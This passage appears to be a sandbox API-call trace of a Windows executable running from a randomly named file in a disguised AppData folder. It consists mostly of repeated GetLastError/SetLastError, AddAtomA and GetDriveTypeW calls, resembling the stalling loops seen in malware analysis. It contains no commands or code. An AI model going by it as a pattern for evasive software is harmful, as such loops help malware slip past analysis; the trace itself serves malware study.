2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x5a\xe8\xeb\xef\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0097.428] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe")) returned 0x36 [0097.428] GetLastError () returned 0x0 [0097.428] SetLastError (dwErrCode=0x0) [0097.428] GetLastError () returned 0x0 [0097.428] SetLastError (dwErrCode=0x0) [0097.428] GetLastError () returned 0x0 [0097.428] SetLastError (dwErrCode=0x0) [0097.428] GetLastError () returned 0x0 [0097.428] SetLastError (dwErrCode=0x0) [0097.428] GetLastError () returned 0x0 [0097.428] SetLastError (dwErrCode=0x0) [0097.428] GetLastError () returned 0x0 [0097.428] SetLastError (dwErrCode=0x0) [0097.428] GetLastError () returned 0x0 [0097.428] SetLastError (dwErrCode=0x0) [0097.428] GetLastError () returned 0x0 [0097.428] SetLastError (dwErrCode=0x0) [0097.428] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] GetLastError () returned 0x0 [0097.430] SetLastError (dwErrCode=0x0) [0097.430] GetLastError () returned 0x0 [0097.430] SetLastError (dwErrCode=0x0) [0097.430] GetLastError () returned 0x0 [0097.430] SetLastError (dwErrCode=0x0) [0097.430] GetLastError () returned 0x0 [0097.430] SetLastError (dwErrCode=0x0) [0097.430] GetLastError () returned 0x0 [0097.430] SetLastError (dwErrCode=0x0) [0097.430] GetLastError () returned 0x0 [0097.430] SetLastError (dwErrCode=0x0) [0097.430] GetLastError () returned 0x0 [0097.430] SetLastError (dwErrCode=0x0) [0097.430] GetLastError () returned 0x0 [0097.430] SetLastError (dwErrCode=0x0) [0097.430] GetLastError () returned 0x0 [0097.430] SetLastError (dwErrCode=0x0) [0097.430] GetLastError () returned 0x0 [0097.430] SetLastError (dwErrCode=0x0) [0097.430] GetLastError () returned 0x0 [0097.430] SetLastError (dwErrCode=0x0) [0097.431] GetLastError () returned 0x0 [0097.431] SetLastError (dwErrCode=0x0) [0097.431] GetLastError () returned 0x0 [0097.431] SetLastError (dwErrCode=0x0) [0097.431] GetLastError () returned 0x0 [0097.431] SetLastError (dwErrCode=0x0) [0097.431] GetLastError () returned 0x0 [0097.431] SetLastError (dwErrCode=0x0) [0097.431] GetLastError () returned 0x0 [0097.431] SetLastError (dwErrCode=0x0) [0097.431] GetLastError () returned 0x0 [0097.431] SetLastError (dwErrCode=0x0) [0097.431] GetLastError () returned 0x0 [0097.431] SetLastError (dwErrCode=0x0) [0097.431] GetLastError () returned 0x0 [0097.431] SetLastError (dwErrCode=0x0) [0097.431] GetLastError () returned 0x0 [0097.431] SetLastError (dwErrCode=0x0) [0097.431] GetLastError () returned 0x0 [0097.432] SetLastError (dwErrCode=0x0) [0097.432] GetLastError () returned 0x0 [0097.432] SetLastError (dwErrCode=0x0) [0097.432] GetLastError () returned 0x0 [0097.432] SetLastError (dwErrCode=0x0) [0097.432] GetLastError () returned 0x0 [0097.432] SetLastError (dwErrCode=0x0) [0097.432] GetLastError () returned 0x0 [0097.432] SetLastError (dwErrCode=0x0) [0097.432] GetLastError () returned 0x0 [0097.432] SetLastError (dwErrCode=0x0) [0097.432] GetLastError () returned 0x0 [0097.432] SetLastError (dwErrCode=0x0) [0097.432] GetLastError () returned 0x0 [0097.432] SetLastError (dwErrCode=0x0) [0097.432] GetLastError () returned 0x0 [0097.432] SetLastError (dwErrCode=0x0) [0097.432] GetLastError () returned 0x0 [0097.432] SetLastError (dwErrCode=0x0) [0097.432] GetLastError () returned 0x0 [0097.432] SetLastError (dwErrCode=0x0) [0097.433] GetLastError () returned 0x0 [0097.433] SetLastError (dwErrCode=0x0) [0097.433] GetLastError () returned 0x0 [0097.433] SetLastError (dwErrCode=0x0) [0097.433] GetLastError () returned 0x0 [0097.433] SetLastError (dwErrCode=0x0) [0097.433] GetLastError () returned 0x0 [0097.433] SetLastError (dwErrCode=0x0) [0097.433] GetLastError () returned 0x0 [0097.433] SetLastError (dwErrCode=0x0) [0097.433] GetLastError () returned 0x0 [0097.433] SetLastError (dwErrCode=0x0) [0097.433] GetLastError () returned 0x0 [0097.433] SetLastError (dwErrCode=0x0) [0097.433] GetLastError () returned 0x0 [0097.433] SetLastError (dwErrCode=0x0) [0097.433] GetLastError () returned 0x0 [0097.433] SetLastError (dwErrCode=0x0) [0097.433] GetLastError () returned 0x0 [0097.433] SetLastError (dwErrCode=0x0) [0097.433] GetLastError () returned 0x0 [0097.434] SetLastError (dwErrCode=0x0) [0097.434] GetLastError () returned 0x0 [0097.434] SetLastError (dwErrCode=0x0) [0097.434] GetLastError () returned 0x0 [0097.434] SetLastError (dwErrCode=0x0) [0097.434] GetLastError () returned 0x0 [0097.434] SetLastError (dwErrCode=0x0) [0097.434] GetLastError () returned 0x0 [0097.434] SetLastError (dwErrCode=0x0) [0097.434] GetLastError () returned 0x0 [0097.434] SetLastError (dwErrCode=0x0) [0097.434] GetLastError () returned 0x0 [0097.434] SetLastError (dwErrCode=0x0) [0097.434] GetLastError () returned 0x0 [0097.434] SetLastError (dwErrCode=0x0) [0097.434] GetLastError () returned 0x0 [0097.434] SetLastError (dwErrCode=0x0) [0097.434] GetLastError () returned 0x0 [0097.434] SetLastError (dwErrCode=0x0) [0097.434] GetLastError () returned 0x0 [0097.434] SetLastError (dwErrCode=0x0) [0097.434] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.439] SetLastError (dwErrCode=0x0) [0097.439] GetLastError () returned 0x0 [0097.439] SetLastError (dwErrCode=0x0) [0097.439] GetLastError () returned 0x0 [0097.439] SetLastError (dwErrCode=0x0) [0097.439] GetLastError () returned 0x0 [0097.439] SetLastError (dwErrCode=0x0) [0097.439] GetLastError () returned 0x0 [0097.439] SetLastError (dwErrCode=0x0) [0097.439] GetLastError () returned 0x0 [0097.439] SetLastError (dwErrCode=0x0) [0097.439] GetLastError () returned 0x0 [0097.439] SetLastError (dwErrCode=0x0) [0097.439] GetLastError () returned 0x0 [0097.439] SetLastError (dwErrCode=0x0) [0097.439] GetLastError () returned 0x0 [0097.439] SetLastError (dwErrCode=0x0) [0097.439] GetLastError () returned 0x0 [0097.439] SetLastError (dwErrCode=0x0) [0097.439] GetLastError () returned 0x0 [0097.439] SetLastError (dwErrCode=0x0) [0097.439] GetLastError () returned 0x0 [0097.440] SetLastError (dwErrCode=0x0) [0097.440] GetLastError () returned 0x0 [0097.440] SetLastError (dwErrCode=0x0) [0097.440] GetLastError () returned 0x0 [0097.440] SetLastError (dwErrCode=0x0) [0097.440] GetLastError () returned 0x0 [0097.440] SetLastError (dwErrCode=0x0) [0097.440] GetLastError () returned 0x0 [0097.440] SetLastError (dwErrCode=0x0) [0097.440] GetLastError () returned 0x0 [0097.440] SetLastError (dwErrCode=0x0) [0097.440] GetLastError () returned 0x0 [0097.440] SetLastError (dwErrCode=0x0) [0097.440] GetLastError () returned 0x0 [0097.440] SetLastError (dwErrCode=0x0) [0097.440] GetLastError () returned 0x0 [0097.440] SetLastError (dwErrCode=0x0) [0097.440] GetLastError () returned 0x0 [0097.440] SetLastError (dwErrCode=0x0) [0097.440] GetLastError () returned 0x0 [0097.440] SetLastError (dwErrCode=0x0) [0097.440] GetLastError () returned 0x0 [0097.441] SetLastError (dwErrCode=0x0) [0097.441] GetLastError () returned 0x0 [0097.441] SetLastError (dwErrCode=0x0) [0097.441] GetLastError () returned 0x0 [0097.441] SetLastError (dwErrCode=0x0) [0097.441] GetLastError () returned 0x0 [0097.441] SetLastError (dwErrCode=0x0) [0097.441] GetLastError () returned 0x0 [0097.441] SetLastError (dwErrCode=0x0) [0097.441] GetLastError () returned 0x0 [0097.441] SetLastError (dwErrCode=0x0) [0097.441] GetLastError () returned 0x0 [0097.441] SetLastError (dwErrCode=0x0) [0097.441] GetLastError () returned 0x0 [0097.441] SetLastError (dwErrCode=0x0) [0097.441] GetLastError () returned 0x0 [0097.441] SetLastError (dwErrCode=0x0) [0097.441] GetLastError () returned 0x0 [0097.441] SetLastError (dwErrCode=0x0) [0097.441] GetLastError () returned 0x0 [0097.442] SetLastError (dwErrCode=0x0) [0097.442] GetLastError () returned 0x0 [0097.442] SetLastError (dwErrCode=0x0) [0097.442] GetLastError () returned 0x0 [0097.442] SetLastError (dwErrCode=0x0) [0097.442] GetLastError () returned 0x0 [0097.442] SetLastError (dwErrCode=0x0) [0097.442] GetLastError () returned 0x0 [0097.442] SetLastError (dwErrCode=0x0) [0097.442] GetLastError () returned 0x0 [0097.442] SetLastError (dwErrCode=0x0) [0097.442] GetLastError () returned 0x0 [0097.442] SetLastError (dwErrCode=0x0) [0097.442] GetLastError () returned 0x0 [0097.442] SetLastError (dwErrCode=0x0) [0097.442] GetLastError () returned 0x0 [0097.442] SetLastError (dwErrCode=0x0) [0097.442] GetLastError () returned 0x0 [0097.442] SetLastError (dwErrCode=0x0) [0097.442] GetLastError () returned 0x0 [0097.442] SetLastError (dwErrCode=0x0) [0097.442] GetLastError () returned 0x0 [0097.443] SetLastError (dwErrCode=0x0) [0097.443] GetLastError () returned 0x0 [0097.443] SetLastError (dwErrCode=0x0) [0097.443] GetLastError () returned 0x0 [0097.443] SetLastError (dwErrCode=0x0) [0097.443] GetLastError () returned 0x0 [0097.443] SetLastError (dwErrCode=0x0) [0097.443] GetLastError () returned 0x0 [0097.443] SetLastError (dwErrCode=0x0) [0097.443] GetLastError () returned 0x0 [0097.443] SetLastError (dwErrCode=0x0) [0097.443] GetLastError () returned 0x0 [0097.443] SetLastError (dwErrCode=0x0) [0097.443] GetLastError () returned 0x0 [0097.443] SetLastError (dwErrCode=0x0) [0097.443] GetLastError () returned 0x0 [0097.443] SetLastError (dwErrCode=0x0) [0097.443] GetLastError () returned 0x0 [0097.443] SetLastError (dwErrCode=0x0) [0097.443] GetLastError () returned 0x0 [0097.443] SetLastError (dwErrCode=0x0) [0097.444] GetLastError () returned 0x0 [0097.444] SetLastError (dwErrCode=0x0) [0097.444] GetLastError () returned 0x0 [0097.444] SetLastError (dwErrCode=0x0) [0097.444] GetLastError () returned 0x0 [0097.444] SetLastError (dwErrCode=0x0) [0097.444] GetLastError () returned 0x0 [0097.444] SetLastError (dwErrCode=0x0) [0097.444] GetLastError () returned 0x0 [0097.444] SetLastError (dwErrCode=0x0) [0097.444] GetLastError () returned 0x0 [0097.444] SetLastError (dwErrCode=0x0) [0097.444] GetLastError () returned 0x0 [0097.444] SetLastError (dwErrCode=0x0) [0097.444] GetLastError () returned 0x0 [0097.444] SetLastError (dwErrCode=0x0) [0097.444] GetLastError () returned 0x0 [0097.444] SetLastError (dwErrCode=0x0) [0097.444] GetLastError () returned 0x0 [0097.444] SetLastError (dwErrCode=0x0) [0097.444] GetLastError () returned 0x0 [0097.445] SetLastError (dwErrCode=0x0) [0097.445] GetLastError () returned 0x0 [0097.445] SetLastError (dwErrCode=0x0) [0097.445] GetLastError () returned 0x0 [0097.445] SetLastError (dwErrCode=0x0) [0097.445] GetLastError () returned 0x0 [0097.445] SetLastError (dwErrCode=0x0) [0097.445] GetLastError () returned 0x0 [0097.445] SetLastError (dwErrCode=0x0) [0097.445] GetLastError () returned 0x0 [0097.445] SetLastError (dwErrCode=0x0) [0097.445] GetLastError () returned 0x0 [0097.445] SetLastError (dwErrCode=0x0) [0097.445] GetLastError () returned 0x0 [0097.445] SetLastError (dwErrCode=0x0) [0097.445] GetLastError () returned 0x0 [0097.445] SetLastError (dwErrCode=0x0) [0097.445] GetLastError () returned 0x0 [0097.445] SetLastError (dwErrCode=0x0) [0097.445] GetLastError () returned 0x0 [0097.445] SetLastError (dwErrCode=0x0) [0097.445] GetLastError () returned 0x0 [0097.446] SetLastError (dwErrCode=0x0) [0097.446] GetLastError () returned 0x0 [0097.446] SetLastError (dwErrCode=0x0) [0097.446] GetLastError () returned 0x0 [0097.446] SetLastError (dwErrCode=0x0) [0097.446] GetLastError () returned 0x0 [0097.446] SetLastError (dwErrCode=0x0) [0097.446] GetLastError () returned 0x0 [0097.446] SetLastError (dwErrCode=0x0) [0097.446] GetLastError () returned 0x0 [0097.446] SetLastError (dwErrCode=0x0) [0097.446] GetLastError () returned 0x0 [0097.446] SetLastError (dwErrCode=0x0) [0097.446] GetLastError () returned 0x0 [0097.446] SetLastError (dwErrCode=0x0) [0097.446] GetLastError () returned 0x0 [0097.446] SetLastError (dwErrCode=0x0) [0097.446] GetLastError () returned 0x0 [0097.446] SetLastError (dwErrCode=0x0) [0097.446] GetLastError () returned 0x0 [0097.502] SetLastError (dwErrCode=0x0) [0097.502] GetLastError () returned 0x0 [0097.502] SetLastError (dwErrCode=0x0) [0097.502] GetLastError () returned 0x0 [0097.502] SetLastError (dwErrCode=0x0) [0097.502] GetLastError () returned 0x0 [0097.502] SetLastError (dwErrCode=0x0) [0097.502] GetLastError () returned 0x0 [0097.502] SetLastError (dwErrCode=0x0) [0097.502] GetLastError () returned 0x0 [0097.502] SetLastError (dwErrCode=0x0) [0097.502] GetLastError () returned 0x0 [0097.502] SetLastError (dwErrCode=0x0) [0097.502] GetLastError () returned 0x0 [0097.502] SetLastError (dwErrCode=0x0) [0097.502] GetLastError () returned 0x0 [0097.502] SetLastError (dwErrCode=0x0) [0097.502] GetLastError () returned 0x0 [0097.502] SetLastError (dwErrCode=0x0) [0097.502] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.505] SetLastError (dwErrCode=0x0) [0097.505] GetLastError () returned 0x0 [0097.505] SetLastError (dwErrCode=0x0) [0097.505] GetLastError () returned 0x0 [0097.505] SetLastError (dwErrCode=0x0) [0097.505] GetLastError () returned 0x0 [0097.505] SetLastError (dwErrCode=0x0) [0097.505] GetLastError () returned 0x0 [0097.505] SetLastError (dwErrCode=0x0) [0097.505] GetLastError () returned 0x0 [0097.505] SetLastError (dwErrCode=0x0) [0097.505] GetLastError () returned 0x0 [0097.505] SetLastError (dwErrCode=0x0) [0097.505] GetLastError () returned 0x0 [0097.505] SetLastError (dwErrCode=0x0) [0097.505] GetLastError () returned 0x0 [0097.505] SetLastError (dwErrCode=0x0) [0097.505] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0097.505] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0097.506] LoadLibraryW (lpLibFileName="dfgdfgdfg.exe") returned 0x0 [0097.507] AddAtomA (lpString=0x0) returned 0x0 [0097.507] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.507] AddAtomA (lpString=0x0) returned 0x0 [0097.507] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.507] AddAtomA (lpString=0x0) returned 0x0 [0097.507] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.507] AddAtomA (lpString=0x0) returned 0x0 [0097.507] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.507] AddAtomA (lpString=0x0) returned 0x0 [0097.507] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.507] AddAtomA (lpString=0x0) returned 0x0 [0097.507] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.507] AddAtomA (lpString=0x0) returned 0x0 [0097.507] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.507] AddAtomA (lpString=0x0) returned 0x0 [0097.507] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.507] AddAtomA (lpString=0x0) returned 0x0 [0097.507] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.507] AddAtomA (lpString=0x0) returned 0x0 [0097.507] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.507] AddAtomA (lpString=0x0) returned 0x0 [0097.507] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.509] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.509] AddAtomA (lpString=0x0) returned 0x0 [0097.509] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.509] AddAtomA (lpString=0x0) returned 0x0 [0097.509] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.509] AddAtomA (lpString=0x0) returned 0x0 [0097.509] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.509] AddAtomA (lpString=0x0) returned 0x0 [0097.509] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.509] AddAtomA (lpString=0x0) returned 0x0 [0097.509] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.509] AddAtomA (lpString=0x0) returned 0x0 [0097.509] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.509] AddAtomA (lpString=0x0) returned 0x0 [0097.509] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.509] AddAtomA (lpString=0x0) returned 0x0 [0097.509] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.509] AddAtomA (lpString=0x0) returned 0x0 [0097.509] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.509] AddAtomA (lpString=0x0) returned 0x0 [0097.509] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW 